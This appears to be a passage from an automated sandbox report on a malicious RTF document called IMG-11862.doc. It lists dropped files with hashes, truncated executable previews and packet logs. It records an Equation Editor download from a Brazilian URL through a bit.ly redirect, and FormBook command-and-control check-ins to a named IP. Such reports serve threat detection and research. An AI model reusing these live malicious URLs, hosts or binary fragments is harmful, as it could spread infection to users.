	27Label_00384463.doc.js	Get hash	malicious	Browse	177.70.106.102
	27Label_00384463.doc.js	Get hash	malicious	Browse	177.70.106.102

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	IMG-60612.doc	Get hash	malicious	Browse
	P.O 119735.doc__.rtf	Get hash	malicious	Browse
	IMG-50230.doc	Get hash	malicious	Browse
	IMG_155710.doc	Get hash	malicious	Browse
	IMG_4785.doc	Get hash	malicious	Browse
	IMG_688031.doc	Get hash	malicious	Browse
	IMG_010357.doc	Get hash	malicious	Browse
	Soa.doc	Get hash	malicious	Browse
	IMG_06176.doc	Get hash	malicious	Browse
	IMG_50617.doc	Get hash	malicious	Browse
	TT Copy.doc	Get hash	malicious	Browse
	QL-0217.doc	Get hash	malicious	Browse
	RT-05723.doc	Get hash	malicious	Browse
	PIO-06711.doc	Get hash	malicious	Browse
	PO-JQ1125742021.xlsx	Get hash	malicious	Browse
	ORDER-45103.xls	Get hash	malicious	Browse
	Debt Statement.xls	Get hash	malicious	Browse
	SD-1061.xls	Get hash	malicious	Browse
	NEW ORDER.xls	Get hash	malicious	Browse
	exploit.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	834536
Entropy (8bit):	5.839531345051908
Encrypted:	false
SSDEEP:	12288:oJgJ5HfNbxpopPnGUw2DargRxEc3gmR4xSa6v1lnG:oJgJj/4fM/8Hwmymd5G
MD5:	5A7E3E87F007DA7D39BD5CB58CAC10D0
SHA1:	36CE7C3A2020CD79228702564F8FAE62CFEE92A1
SHA-256:	C695C80CD714ECC710510143EE54B69BDDA7FA7F01C32AE902EC3D32AF36D489
SHA-512:	BE6E53DDD02E3256A7C41C034E21AD8F469B4C95C38900AE0AA2D4A460545AD5F3B5A24E491C92663D9E1C55CEEA6B9C00EB9EADA363CE794CC84604BF027B6E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Reputation:	low
IE Cache URL:	http://neuromedic.com.br/cgi./IMG-11862.pdf
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......7.................F...J.......e... ........@.. ....................................`.................................Xe..S........F...............)........................................................... ............... ..H............text....E... ...F.................. ..`.rsrc....F.......H...H..............@..@.reloc..............................@..B.................e......H........;...)......I.................................................... .........%.....(......... 4........%.....(............0.............E............#.......<...#...@...@.......(.......+...a.5Y.aE..........+..+....+.(......X..%Z.X.],...+..+...+......E.............................&+..0..........+>..E....3...D...l...,...3...n...,........................&...+.......+...a.[Y.aE...........+..+......+.......(........+...X. ..... ..... ......[.Y2....8e.....+......8V....0..

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3oj1Gnn[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	130
Entropy (8bit):	4.749463400045454
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyiQ1wHZYmJ3bXLMBFSXbKFvNGb:qFzLIeco3XLx92iQ1w5YmJL8SLWQb
MD5:	2CB5FE1A8E8FBD505548C2007A4154F3
SHA1:	4D13B71A0FDCA47D9B8698E59FB0C374F87911BB
SHA-256:	B66AA981A803358F40F15927D8558C9C19B5F754FD1E5D8AB496B2E5731DE628
SHA-512:	85E7918B7B40D2759F5C2847FF37DA51C88AD41B5CC7EF361724F8EC6A8FABA08C7CA712AC65A49B2EC5860FD0D7FA2E2F88DCFE1BC7B96B65B33000969B0CC0
Malicious:	false
Reputation:	low
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="http://neuromedic.com.br/cgi./IMG-11862.pdf">moved here</a></body>.</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6894A6BA-6F93-4194-97B0-E6749671AC21}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9312A5BA-14BB-458B-BB2D-5B313121AE89}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	3392986
Entropy (8bit):	4.159013987555469
Encrypted:	false
SSDEEP:	49152:PGvPvR0GUvzGGGvWvpvOvGJGpxvGmGOsvGEGdsvGMGvgGvZv3qLN:eHpV0ynORm+4/+HN+FG+dJBfON
MD5:	CDFD00E64DC5034C70BBC86FBE2D6DE4
SHA1:	F28E131621CF5589ECE9D600FE567EF8E9653B4E
SHA-256:	EE88C34E545B94B40BAD81E8EB3FBD03E5940CB89F19344C41A589F9EE9BF6F1
SHA-512:	1EAD9FA82B8D71402E950EF1AFF1B45D62927C813D68C72F62D88764144742AE6BFEF51FCBC0F38C95769AE227EFB73D0D0602ADCCB5A87CFBBB2744EDF7B4DD
Malicious:	false
Reputation:	low
Preview:	..@.Q.G.6.T.Z.C.U.e.f.7.7.h.z.7.v.S.@.-.y.i.R.K.B.Y.9.a.G.n.T.X.9.P.D.q.8.<.e.h.&.&.0._.M.-.D._.g.-.-._.-.d.,.6.4.>.3.6.8.4.5.$.C.v.>.y.t.=.n.5.\|.:.%._.>.j.n.6.%.b.m.;.=.u.%.8.9...6.5..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E42C9A4D-C73B-45F3-859A-E103BFD96442}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3554734412254814
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbK:IiiiiiiiiifdLloZQc8++lsJe1Mz3l/
MD5:	795A4F410A9505CB7655E5174E414E77
SHA1:	05AFC6A04C5ECD6D5CC4113B47F748034686D312
SHA-256:	05504730FF130C7DA651DAEDC0453D716CCC6E1810264F0796DD10EF89AEC8FA
SHA-512:	66ED85A90A15E18BB9B3AA0E04257594FA452659A3755CCCD58F5C04E3AB5B2B021D68A9EE10DCEF3F74F04D7DF01E43173D4ED4C8ECAE404D29F4C3A17DB7E6
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Download File
Process:	C:\Users\Public\69577.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42176
Entropy (8bit):	6.200071124937496
Encrypted:	false
SSDEEP:	768:/mdeeaAQ7dX6Iq8yFMyRd0lijbEBJoGs:/yejP7dORdS+bEBJoG
MD5:	DA55A7AED2F65D6104E1A79EE067CC00
SHA1:	B464DB0A153DCA4CC1F301490CD14345C15F5A0A
SHA-256:	161BCBF5F7D766B70ACE9CDF7B3B250D256AB601720F09F4183A1FA4F92DCF54
SHA-512:	2C33706030A7ABF1B15750B1A89BFD6A7B8D30CD9E83443565C9343DB511AA2CC5C689F24076A557AAEA67EC685DAC5183B6E54ED27224CAE98D2B4455095DA8
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: IMG-60612.doc, Detection: malicious, Browse Filename: P.O 119735.doc__.rtf, Detection: malicious, Browse Filename: IMG-50230.doc, Detection: malicious, Browse Filename: IMG_155710.doc, Detection: malicious, Browse Filename: IMG_4785.doc, Detection: malicious, Browse Filename: IMG_688031.doc, Detection: malicious, Browse Filename: IMG_010357.doc, Detection: malicious, Browse Filename: Soa.doc, Detection: malicious, Browse Filename: IMG_06176.doc, Detection: malicious, Browse Filename: IMG_50617.doc, Detection: malicious, Browse Filename: TT Copy.doc, Detection: malicious, Browse Filename: QL-0217.doc, Detection: malicious, Browse Filename: RT-05723.doc, Detection: malicious, Browse Filename: PIO-06711.doc, Detection: malicious, Browse Filename: PO-JQ1125742021.xlsx, Detection: malicious, Browse Filename: ORDER-45103.xls, Detection: malicious, Browse Filename: Debt Statement.xls, Detection: malicious, Browse Filename: SD-1061.xls, Detection: malicious, Browse Filename: NEW ORDER.xls, Detection: malicious, Browse Filename: exploit.doc, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W..............0..X..........:w... ........@.. ....................................`..................................v..O....... ............f...>...........u............................................... ............... ..H............text...@W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B.................w......H........#..,Q...................t.......................................0..K........-....i.......r...p.o....,....r...p.o....-.......o......o.....$........o....(....(......8...(....o......r...p.o.......4........o......... ........o......s.........o ...s!.....s".......r]..prg..po#.....r...p.o#.....r...pr...po#.........s.........($.....t@...r...p(%...&..r...p.(&...s'.......o(...&..o)....(...o+.....&...(,...........3..@......R...s.....s....(-...:.(......}P...J.{P....o/..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IMG-11862.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Thu Jan 28 02:08:36 2021, length=1817663, window=hide
Category:	dropped
Size (bytes):	2018
Entropy (8bit):	4.558356175497096
Encrypted:	false
SSDEEP:	48:8hb/XT0jkew2tr6dblb5Qh2hb/XT0jkew2tr6dblb5Q/:8hb/XojkettOdbB5Qh2hb/XojkettOdU
MD5:	345EA66D07A76E7843C180214157D437
SHA1:	1F8B1245B6FEA9141A5D0183F9517B63CFFCD411
SHA-256:	C5A1D16ED21D24F35CD655D10A09D1A59011D703D1B73D21A2663CE0291F4583
SHA-512:	6A4C2339D963EA40AF03F0D847B156EB0D8A79C40CC0C03E0D5D855DE7771358902B4A128E57ABA8EFD3FAE15AA2F444DD375A39280999D2785921AFAEF79465
Malicious:	false
Preview:	L..................F.... ....}..{...}..{..x.;."...?............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....d.2.?...<R.. .IMG-11~1.DOC..H.......Q.y.Q.y...8.....................I.M.G.-.1.1.8.6.2...d.o.c.......w...............-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\IMG-11862.doc.$.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.M.G.-.1.1.8.6.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817..........D_....3N...W...9F.C...........[D_....3N...W...9F.C.......

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	65
Entropy (8bit):	4.3217125287003695
Encrypted:	false
SSDEEP:	3:M1J3bU0ArbUmX1J3bUv:MTAh2
MD5:	25FFC954552B4E6BDC33C291601E3942
SHA1:	DD0B184EE23BE19C12421F51178AC78325E6D1DD
SHA-256:	8426C7B0B0D4786EA5A276829452759DE1B542AB7BCBAB6B272C1CC6934EBE42
SHA-512:	5468A95AA7478820825EDAA3305588BD01DBA75030593F6970333764DB9E13EA07BB845614F38560ACCE4649D6F53201BD91E5CF76BF83AACEC719C08CCB8C54
Malicious:	false
Preview:	[doc]..IMG-11862.LNK=0..IMG-11862.LNK=0..[doc]..IMG-11862.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WBLPQVYT.txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	ASCII text
Category:	downloaded
Size (bytes):	89
Entropy (8bit):	4.2820235483020275
Encrypted:	false
SSDEEP:	3:jvgcaHEKLHGUHUsYi2IcAw2WKVR7uRTXn:0PlHU7i2CwxMWTXn
MD5:	03B9B572B1CF9298F235F71007F96F7B
SHA1:	3463B889ACE6B47AADA1E2457B40C888E4099D05
SHA-256:	2B8AFEF0F56256C475F1D658A6C437925531AA1FBABF3845A153B1A48CBD7122
SHA-512:	9C3B806DD8A5052D6C1A9FF2D7C61ABE6BA0FFAEAD1A5700AC04C1B9DD7AF598289A2EEF1E3875D79F0C695B33F23CED7DCE7D723999FD71D796E88A9E9E69FB
Malicious:	false
IE Cache URL:	bit.ly/
Preview:	_bit.l0ri9h-bac8a3fbc50c8cd308-00G.bit.ly/.1536.1495057536.30900809.659557545.30864675.*.

C:\Users\user\Desktop\~$G-11862.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\Public\69577.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	834536
Entropy (8bit):	5.839531345051908
Encrypted:	false
SSDEEP:	12288:oJgJ5HfNbxpopPnGUw2DargRxEc3gmR4xSa6v1lnG:oJgJj/4fM/8Hwmymd5G
MD5:	5A7E3E87F007DA7D39BD5CB58CAC10D0
SHA1:	36CE7C3A2020CD79228702564F8FAE62CFEE92A1
SHA-256:	C695C80CD714ECC710510143EE54B69BDDA7FA7F01C32AE902EC3D32AF36D489
SHA-512:	BE6E53DDD02E3256A7C41C034E21AD8F469B4C95C38900AE0AA2D4A460545AD5F3B5A24E491C92663D9E1C55CEEA6B9C00EB9EADA363CE794CC84604BF027B6E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 43%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......7.................F...J.......e... ........@.. ....................................`.................................Xe..S........F...............)........................................................... ............... ..H............text....E... ...F.................. ..`.rsrc....F.......H...H..............@..@.reloc..............................@..B.................e......H........;...)......I.................................................... .........%.....(......... 4........%.....(............0.............E............#.......<...#...@...@.......(.......+...a.5Y.aE..........+..+....+.(......X..%Z.X.],...+..+...+......E.............................&+..0..........+>..E....3...D...l...,...3...n...,........................&...+.......+...a.[Y.aE...........+..+......+.......(........+...X. ..... ..... ......[.Y2....8e.....+......8V....0..

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	6.349594734999784
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	IMG-11862.doc
File size:	1817663
MD5:	3bae5b3c3fd75495623e7b2c77d6a63f
SHA1:	2feb9e59edbdf27d6a4aa92c2090eabf12d02ea1
SHA256:	a814890399194524b5be9cd3e21dce6f1c2272d1cf2dcaa8433e0cfc6ef2b06b
SHA512:	62525d74e1905df11046743303788da57076c56d0a3de6bfbeb772714c2db6d82428caf5efa618ba889141231b1d14d312b00a6a63d1cc4e9d1295de0e84db10
SSDEEP:	12288:K9msPun9msPun9msPun9msPun9msPun9msPun9msPun9msPun9msPun9msPun9mb:8aaaaaaaaaaaaaaaaaaaaaaaaJd8
File Content Preview:	{\rtf76859\page87576133526591799@QG6TZCUef77hz7vS@-yiRKBY9aGnTX9PDq8<eh&&0_M-D_g--_-d,64>36845$Cv>yt=n5\|:%_>jn6%bm\mklP;=u\h86%89.65.... .... ...... .... .... ...

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	001B2B33h								no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/27/21-19:10:30.843047	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	35.208.61.46
01/27/21-19:10:30.843047	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	35.208.61.46
01/27/21-19:10:30.843047	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49170	80	192.168.2.22	35.208.61.46

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 27, 2021 19:09:17.304465055 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:09:17.352570057 CET	80	49167	67.199.248.10	192.168.2.22
Jan 27, 2021 19:09:17.352669001 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:09:17.353085995 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:09:17.404479027 CET	80	49167	67.199.248.10	192.168.2.22
Jan 27, 2021 19:09:17.496602058 CET	80	49167	67.199.248.10	192.168.2.22
Jan 27, 2021 19:09:17.496733904 CET	49167	80	192.168.2.22	67.199.248.10
Jan 27, 2021 19:09:17.589572906 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:17.860610008 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:17.860744953 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:17.861130953 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.132774115 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142685890 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142714977 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142738104 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142759085 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142759085 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142780066 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142798901 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142802954 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142823935 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142827988 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142838955 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142860889 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142860889 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142885923 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.142894983 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.142936945 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.146226883 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412144899 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412189960 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412215948 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412239075 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412256956 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412280083 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412302017 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412324905 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412343025 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412347078 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412364006 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412369013 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412372112 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412374020 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412395000 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412400007 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412416935 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412441969 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412461042 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.412461042 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412467957 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.412538052 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.414731979 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688185930 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688255072 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688302040 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688344002 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688380957 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688417912 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688455105 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688467026 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688492060 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688493013 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688529968 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688534021 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688566923 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688572884 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688607931 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688616991 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688648939 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688659906 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688683033 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688704014 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688734055 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688740969 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688766956 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688779116 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688802958 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688813925 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688838959 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688846111 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688874960 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688884020 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688905954 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688930988 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.688941002 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.688972950 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.689002991 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.689011097 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.689038992 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.689049006 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.689074039 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.689104080 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.690562010 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.957851887 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.957936049 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.957988024 CET	80	49168	177.70.106.69	192.168.2.22
Jan 27, 2021 19:09:18.958024979 CET	49168	80	192.168.2.22	177.70.106.69
Jan 27, 2021 19:09:18.958038092 CET	80	49168	177.70.106.69	192.168.2.22
